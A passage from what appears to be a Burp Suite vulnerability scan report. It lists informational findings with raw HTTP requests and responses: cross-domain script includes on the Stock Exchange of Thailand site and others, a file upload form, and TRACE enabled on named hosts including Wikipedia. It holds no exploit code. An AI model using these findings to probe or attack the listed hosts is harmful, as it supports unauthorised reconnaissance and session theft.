Last-Modified: Fri, 29 Oct 2010 10:05:11 GMT
ETag: "dc6fd-87d4-980e83c0"
Accept-Ranges: bytes
Content-Length: 34772
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand: FAQs - Ab
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.83. http://www.set.or.th/en/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/index.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:51 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 11:13:45 GMT
ETag: "dc6f3-7c02-f8326c40"
Accept-Ranges: bytes
Content-Length: 31746
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.84. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:24 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 08:45:17 GMT
ETag: "7800a2-6911-a1aea140"
Accept-Ranges: bytes
Content-Length: 26897
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand - IPO Showc
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.85. http://www.set.or.th/en/products/index/setindex_p1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/products/index/setindex_p1.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/products/index/setindex_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/regulations/cg/roles_p1.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:33 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 10:00:50 GMT
ETag: "124b84-7b8d-7a45f880"
Accept-Ranges: bytes
Content-Length: 31629
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand - Products
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.86. http://www.set.or.th/en/regulations/cg/roles_p1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/regulations/cg/roles_p1.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/regulations/cg/roles_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:47 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 10:16:10 GMT
ETag: "780163-5583-b11c0e80"
Accept-Ranges: bytes
Content-Length: 21891
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand - Supervisi
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.87. http://www.set.or.th/en/sitemap/for_listing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /en/sitemap/for_listing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/sitemap/for_listing.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:56 GMT
Server: Apache
Last-Modified: Wed, 30 Jun 2010 04:10:59 GMT
ETag: "78016f-6039-8a8a5ac0"
Accept-Ranges: bytes
Content-Length: 24633
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/noleftmenu-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand: You
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
...[SNIP]...
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.88. http://www.set.or.th/nicepage_404.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /nicepage_404.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nicepage_404.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/integrated-set.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:32 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 09:21:14 GMT
ETag: "cd18c-33cf-49161680"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.89. http://www.set.or.th/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /search.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/shortcut-en.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:23 GMT
Server: Apache
Last-Modified: Sat, 04 Jul 2009 08:27:01 GMT
ETag: "cd193-5bf-9797f40"
Accept-Ranges: bytes
Content-Length: 1471
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
.topbox {FONT: 8pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Verdana, AngsanaUPC
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=th"></script>
...[SNIP]...

23.90. http://www.set.or.th/set/oppdaybyperiod.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /set/oppdaybyperiod.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=884D2D7AB4DAC6D78614FFFB7A7D8586; Path=/set
Content-Length: 118042


<html>
<head>
<link href="/set/styles/setstyle.css;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.91. http://www.set.or.th/th/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /th/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /th/index.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:24 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 11:14:17 GMT
ETag: "52c1e7-8902-fa1ab440"
Accept-Ranges: bytes
Content-Length: 35074
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
...[SNIP]...
<!-- END WEBSTAT CODE -->
<script type="text/javascript" src="http://hits.truehits.in.th/clickmap/clickmap.js"></script>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.92. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.93. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:57 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=_hWN399XTxQ; path=/; domain=.youtube.com; expires=Thu, 29-Dec-2011 13:33:57 GMT
Set-Cookie: GEO=84476706a67ed9e0af16319f09944e3fcwsAAAAzVVOtwdbzTcAERQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: yNzcxRHpNN0ttUzA3LVpZYlMtWWVCZjF2c0R1cmt3T3pXUDlKMFQwWlNHSklzVzJWd3JtOEpB -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflqc72z_.js"></script>
...[SNIP]...

23.94. http://www2.itt-tech.edu/it/d/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.itt-tech.edu
Path:   /it/d/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /it/d/?code=12268064030|networking%20security HTTP/1.1
Host: www2.itt-tech.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:50 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Set-Cookie: ITD=12268064030%7Cnetworking%20security;domain=.itt-tech.edu;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Set-Cookie: FLOWSIM5=http%3A%2F%2Fwww%2Esedoparking%2Ecom%2Fsearch%2Fregistrar%2Ephp%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking%2Ecom;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 25005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

24. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /translate_t?q=barkley+bank&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:26 GMT
Expires: Tue, 03 May 2011 13:27:26 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=71e2231686a4df92:TM=1304429246:LM=1304429246:S=UZVNqCuXSydjzUQK; expires=Thu, 02-May-2013 13:27:26 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

25. TRACE method is enabled  previous  next
There are 41 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


25.1. http://18.xg4ken.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 18.xg4ken.com
Cookie: 752f41d7c79ff3cc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:15:03 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 18.xg4ken.com
Cookie: 752f41d7c79ff3cc


25.2. http://2-thai.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2-thai.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 2-thai.com
Cookie: 12f0819cd4553d10

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:15:09 GMT
Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8g mod_dp20/0.99.2 PHP/5.2.5 mod_python/3.3.1 Python/2.5.1 mod_ruby/1.2.6 Ruby/1.8.6(2007-09-24)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 2-thai.com
Cookie: 12f0819cd4553d10


25.3. http://a.unanimis.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.unanimis.co.uk
Path:   /

Request

TRACE / HTTP/1.0
Host: a.unanimis.co.uk
Cookie: 1af0f9b4a7a9e022

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: a.unanimis.co.uk
Cookie: 1af0f9b4a7a9e022
X-Forwarded-For: 173.193.214.243


25.4. http://de.wikipedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.wikipedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: de.wikipedia.org
Cookie: a75c417fdca468b3

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:19:30 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq62.wikimedia.org
X-Cache-Lookup: NONE from sq62.wikimedia.org:3128
X-Cache: MISS from sq36.wikimedia.org
X-Cache-Lookup: NONE from sq36.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: de.wikipedia.org
Cookie: a75c417fdca468b3
Via: 1.0 sq62.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.46


25.5. http://en.wikipedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: en.wikipedia.org
Cookie: 695eb88eb49fbd0e

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:44:07 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: NONE from sq61.wikimedia.org:3128
X-Cache: MISS from sq40.wikimedia.org
X-Cache-Lookup: NONE from sq40.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: en.wikipedia.org
Cookie: 695eb88eb49fbd0e
Via: 1.0 sq61.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.50


25.6. http://formlessnetworking.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://formlessnetworking.com
Path:   /

Request

TRACE / HTTP/1.0
Host: formlessnetworking.com
Cookie: 16543dbcb8866acd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:58 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: formlessnetworking.com
Cookie: 16543dbcb8866acd


25.7. http://home.controlcase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.controlcase.com
Path:   /

Request

TRACE / HTTP/1.0
Host: home.controlcase.com
Cookie: 1cf386959e589a18

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: home.controlcase.com
Cookie: 1cf386959e589a18


25.8. https://home.controlcase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.controlcase.com
Path:   /

Request

TRACE / HTTP/1.0
Host: home.controlcase.com
Cookie: 7cd222ba565c0051

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:22:34 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: home.controlcase.com
Cookie: 7cd222ba565c0051


25.9. http://ipinfusion.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipinfusion.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ipinfusion.com
Cookie: 2897b3860e898981

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ipinfusion.com
Cookie: 2897b3860e898981


25.10. http://ja.wikipedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ja.wikipedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: ja.wikipedia.org
Cookie: de341e89e4165d52

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:23:47 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: NONE from sq76.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: NONE from sq71.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: ja.wikipedia.org
Cookie: de341e89e4165d52
Via: 1.0 sq76.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.81


25.11. http://javascript.nwbox.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://javascript.nwbox.com
Path:   /

Request

TRACE / HTTP/1.0
Host: javascript.nwbox.com
Cookie: 69550f247758c081

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 22:16:25 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: javascript.nwbox.com
Cookie: 69550f247758c081


25.12. http://jquery.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Request

TRACE / HTTP/1.0
Host: jquery.com
Cookie: 4137f4a4ded4a140

Response

HTTP/1.1 200 OK
